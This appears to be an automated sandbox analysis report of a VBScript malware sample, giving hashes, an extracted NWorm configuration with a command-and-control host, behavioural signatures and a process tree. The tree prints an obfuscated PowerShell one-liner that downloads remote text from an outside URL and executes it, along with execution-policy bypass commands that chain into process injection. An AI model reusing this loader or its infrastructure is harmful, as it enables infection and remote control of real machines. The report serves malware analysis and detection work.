Analysis
-
max time kernel
78s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
28-04-2022 06:43
Static task
static1
Behavioral task
behavioral1
Sample
ASNQSKJPXJLKFXSIEUQYZ.vbs
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
ASNQSKJPXJLKFXSIEUQYZ.vbs
Resource
win10v2004-20220414-en
General
-
Target
ASNQSKJPXJLKFXSIEUQYZ.vbs
-
Size
2KB
-
MD5
f04ca5c16f111ab69293045badd53ad9
-
SHA1
1184fafe345b6f79d6a28d87ef957d7f96b76f52
-
SHA256
00b3ede6f9c3073b02afc09611974bdc4765400ac8c039d620679083b88f63fe
-
SHA512
f07b185f0b78ff3962767a7f2d85957ca9057ee049fdf90d041bd405dcc23fe2a79c71143fde8b907153942be9525941af7ffc2d9e25f6bf1717cb43990f200b
Malware Config
Extracted
nworm
v0.3.8
hnahmoneu.duckdns.org:6391
30896040
Signatures
-
NWorm
A TrickBot module used to propagate to vulnerable domain controllers.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exepowErshEll.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3720 4932 Powershell.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4648 4932 powErshEll.exe -
Blocklisted process makes network request 1 IoCs
Processes:
Powershell.exeflow pid process 5 3720 Powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4236 set thread context of 4956 4236 powershell.exe aspnet_compiler.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
Powershell.exepowershell.exepowErshEll.exepowershell.exepid process 3720 Powershell.exe 3720 Powershell.exe 3644 powershell.exe 3644 powershell.exe 4648 powErshEll.exe 4648 powErshEll.exe 4236 powershell.exe 4236 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Powershell.exepowershell.exepowErshEll.exepowershell.exedescription pid process Token: SeDebugPrivilege 3720 Powershell.exe Token: SeDebugPrivilege 3644 powershell.exe Token: SeDebugPrivilege 4648 powErshEll.exe Token: SeDebugPrivilege 4236 powershell.exe Token: SeIncreaseQuotaPrivilege 3644 powershell.exe Token: SeSecurityPrivilege 3644 powershell.exe Token: SeTakeOwnershipPrivilege 3644 powershell.exe Token: SeLoadDriverPrivilege 3644 powershell.exe Token: SeSystemProfilePrivilege 3644 powershell.exe Token: SeSystemtimePrivilege 3644 powershell.exe Token: SeProfSingleProcessPrivilege 3644 powershell.exe Token: SeIncBasePriorityPrivilege 3644 powershell.exe Token: SeCreatePagefilePrivilege 3644 powershell.exe Token: SeBackupPrivilege 3644 powershell.exe Token: SeRestorePrivilege 3644 powershell.exe Token: SeShutdownPrivilege 3644 powershell.exe Token: SeDebugPrivilege 3644 powershell.exe Token: SeSystemEnvironmentPrivilege 3644 powershell.exe Token: SeRemoteShutdownPrivilege 3644 powershell.exe Token: SeUndockPrivilege 3644 powershell.exe Token: SeManageVolumePrivilege 3644 powershell.exe Token: 33 3644 powershell.exe Token: 34 3644 powershell.exe Token: 35 3644 powershell.exe Token: 36 3644 powershell.exe Token: SeIncreaseQuotaPrivilege 3644 powershell.exe Token: SeSecurityPrivilege 3644 powershell.exe Token: SeTakeOwnershipPrivilege 3644 powershell.exe Token: SeLoadDriverPrivilege 3644 powershell.exe Token: SeSystemProfilePrivilege 3644 powershell.exe Token: SeSystemtimePrivilege 3644 powershell.exe Token: SeProfSingleProcessPrivilege 3644 powershell.exe Token: SeIncBasePriorityPrivilege 3644 powershell.exe Token: SeCreatePagefilePrivilege 3644 powershell.exe Token: SeBackupPrivilege 3644 powershell.exe Token: SeRestorePrivilege 3644 powershell.exe Token: SeShutdownPrivilege 3644 powershell.exe Token: SeDebugPrivilege 3644 powershell.exe Token: SeSystemEnvironmentPrivilege 3644 powershell.exe Token: SeRemoteShutdownPrivilege 3644 powershell.exe Token: SeUndockPrivilege 3644 powershell.exe Token: SeManageVolumePrivilege 3644 powershell.exe Token: 33 3644 powershell.exe Token: 34 3644 powershell.exe Token: 35 3644 powershell.exe Token: 36 3644 powershell.exe Token: SeIncreaseQuotaPrivilege 3644 powershell.exe Token: SeSecurityPrivilege 3644 powershell.exe Token: SeTakeOwnershipPrivilege 3644 powershell.exe Token: SeLoadDriverPrivilege 3644 powershell.exe Token: SeSystemProfilePrivilege 3644 powershell.exe Token: SeSystemtimePrivilege 3644 powershell.exe Token: SeProfSingleProcessPrivilege 3644 powershell.exe Token: SeIncBasePriorityPrivilege 3644 powershell.exe Token: SeCreatePagefilePrivilege 3644 powershell.exe Token: SeBackupPrivilege 3644 powershell.exe Token: SeRestorePrivilege 3644 powershell.exe Token: SeShutdownPrivilege 3644 powershell.exe Token: SeDebugPrivilege 3644 powershell.exe Token: SeSystemEnvironmentPrivilege 3644 powershell.exe Token: SeRemoteShutdownPrivilege 3644 powershell.exe Token: SeUndockPrivilege 3644 powershell.exe Token: SeManageVolumePrivilege 3644 powershell.exe Token: 33 3644 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
Powershell.exepowershell.exepowErshEll.execmd.exepowershell.exedescription pid process target process PID 3720 wrote to memory of 3644 3720 Powershell.exe powershell.exe PID 3720 wrote to memory of 3644 3720 Powershell.exe powershell.exe PID 3644 wrote to memory of 2348 3644 powershell.exe WScript.exe PID 3644 wrote to memory of 2348 3644 powershell.exe WScript.exe PID 4648 wrote to memory of 2132 4648 powErshEll.exe cmd.exe PID 4648 wrote to memory of 2132 4648 powErshEll.exe cmd.exe PID 2132 wrote to memory of 4236 2132 cmd.exe powershell.exe PID 2132 wrote to memory of 4236 2132 cmd.exe powershell.exe PID 4236 wrote to memory of 4956 4236 powershell.exe aspnet_compiler.exe PID 4236 wrote to memory of 4956 4236 powershell.exe aspnet_compiler.exe PID 4236 wrote to memory of 4956 4236 powershell.exe aspnet_compiler.exe PID 4236 wrote to memory of 4956 4236 powershell.exe aspnet_compiler.exe PID 4236 wrote to memory of 4956 4236 powershell.exe aspnet_compiler.exe PID 4236 wrote to memory of 4956 4236 powershell.exe aspnet_compiler.exe PID 4236 wrote to memory of 4956 4236 powershell.exe aspnet_compiler.exe PID 4236 wrote to memory of 4956 4236 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ASNQSKJPXJLKFXSIEUQYZ.vbs"1⤵PID:1688
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell $OZKQAUNQZBLNAOSVUSYESJ = '[S55]!+$]+%*+![<%[[(1[52EM.I=*4$50233)@{\960!01}$^MREAdER]'.Replace('55]!+$]+%*+![<%[[(1[52','ySt').Replace('=*4$50233)@{\960!01}$^','O.StREA');$BXJWCEVOETSZXVTQVVBBQI = ($OZKQAUNQZBLNAOSVUSYESJ -Join '')| .('{1}{0}'-f'EX','I');$BFZNFKRZGXUCXFHDPCRKXY = '[SyS%6%+4/%=5{=\{8![%6+#6*T.W76\/(1*\*=(4@_@@/2<$]8ST]'.Replace('%6%+4/%=5{=\{8![%6+#6*','TEm.NE').Replace('76\/(1*\*=(4@_@@/2<$]8','EbREquE');$UBJZAYXIRZKFCCUCKLTOFV = ($BFZNFKRZGXUCXFHDPCRKXY -Join '')| .('{1}{0}'-f'EX','I');$HNWHJYJEZGKAPCJXAVBIDJ = 'Cr_})4!/]!57\*_9\{8<-<97TE'.Replace('_})4!/]!57\*_9\{8<-<97','Ea');$PYADPHPAUKFOLHATAFZQNV = 'GE\(#7%+58^$6<4!)!*0<2&&onSE'.Replace('\(#7%+58^$6<4!)!*0<2&&','tRESp');$RRJLPFSIPIYQFCZCXNSWIQ = 'GE1@)[6_08}$/}5&2+--(2%8REam'.Replace('1@)[6_08}$/}5&2+--(2%8','tRESponSESt');$EQLBEGTOHFJKWFRNRAQNWI = 'RE2{$[&]8)4\!4]]@0#]+9)_nD'.Replace('2{$[&]8)4\!4]]@0#]+9)_','aDToE'); .('{1}{0}'-f'EX','I')($BXJWCEVOETSZXVTQVVBBQI::new($UBJZAYXIRZKFCCUCKLTOFV::$HNWHJYJEZGKAPCJXAVBIDJ('https://www.wnsolutions.potius.com.br/ServerTyw.txt').$PYADPHPAUKFOLHATAFZQNV().$RRJLPFSIPIYQFCZCXNSWIQ()).$EQLBEGTOHFJKWFRNRAQNWI())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\OZKJYTNPIDFTVBLIQKCQVC.ps1'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\OZKJYTNPIDFTVBLIQKCQVC.vbs"3⤵PID:2348
-
C:\Windows\System32\WindowsPowerShell\v1.0\powErshEll.exepowErshEll -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\OZKJYTNPIDFTVBLIQKCQVC.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\OZKJYTNPIDFTVBLIQKCQVC.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\OZKJYTNPIDFTVBLIQKCQVC\JHZOILCYEIXTNXBBHSHQJA.ps1'"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵PID:4956
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
126KB
MD5fc8efcbdcdc89d37b381fa6db4ec9308
SHA12072c4dd30100c355ff28b809be07431d7e66e67
SHA256b6966b501a1b0a64d6e0c344d06d9699553609f689833bd7de399dd5642ea24c
SHA5123cbe593cda440e08450b562dfc280fb78aa88008d25f190926b2d06b0c3ec8a50084a8dc1063d7bbe176b4c5ef95d0052a79d890a3fa34ba5acba686c777b51f
-
Filesize
127B
MD5360d8e6abc69a97baf1750c414b09697
SHA1f63946aa0b27ba1ab858fc046a0864cef1ef4a01
SHA2569d821a4ba769baff76dbfd6584a0d1b4883f68d73f72826d7a4099bd013ecbaf
SHA512bf23e4da7afa0b355754361cc3733e07d1e535382c45ec7112f89b12a9c99b7ebef3ccdd4dcf86c4b24125ac4dfab6845269e9b9febf37376110246658b0fe0a
-
Filesize
457B
MD5973e36e8a9121a4f784dba53991e019f
SHA17aa5a37eb96276ec77f8b24ce546da624afec0dd
SHA2564391ed86e1f0d0bde77251776059dd4f7c09d063795689d3fbe21897e0f7f842
SHA51217cba32147c7ee63ede683a44392bfc8f5f805208f3d086a4f46a06d0a5ec746014bd76c055c0d929a63a61b0ba94afadfee20e1700b13b904d9de6df3e2c4a9
-
Filesize
1KB
MD584be9efc5a0934d7542b0a13e0bec996
SHA1867b639c015281275e8645726d67bb8749616318
SHA256723e3a490cc4b6f437b2d1b7f98087d1246fef52caf5a19c9f203cde15875a37
SHA51252b0f1ed42852c34f0a54da7774298f64fc8eba6de34ce68253b7056da9904718831b3e51732c205053e823b61ba4cb8d21fad3d0e1187120631fbc0a49bf843
-
Filesize
3KB
MD5fee026663fcb662152188784794028ee
SHA13c02a26a9cb16648fad85c6477b68ced3cb0cb45
SHA256dbd4136bc342e3e92902ec3a30d165452c82997a7ae24ac90775e42d88959e6b
SHA5127b12bd5c8fc4356b9123d6586b4980cf76012663b41c0dab6f6f21567e2f4005c5bcea2cc2158d157e4f801a281f3e04bad3774cddb3122db309ccf662184bd6
-
Filesize
1KB
MD551aa87521f685fa8d4f4bdbd7684a350
SHA1fd4027d9b24c41461525b0f3f764aa6b2ddd5803
SHA2566e9453d9cff64f88f0a0b0b5cda807f7deac354120724137e7426871401ea0d6
SHA512637f0b4c94abb0bcf0bbf21ec2d328eccbf1bd6a37c5dbd309cd428f5aaab08d0f6102a8f45c09372fba57c034fc88ed7950c9afe366583cd5f636ee0b974947
-
Filesize
1KB
MD575b4b2eecda41cec059c973abb1114c0
SHA111dadf4817ead21b0340ce529ee9bbd7f0422668
SHA2565540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134
SHA51287feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626
-
Filesize
64B
MD51a11402783a8686e08f8fa987dd07bca
SHA1580df3865059f4e2d8be10644590317336d146ce
SHA2569b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA5125f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510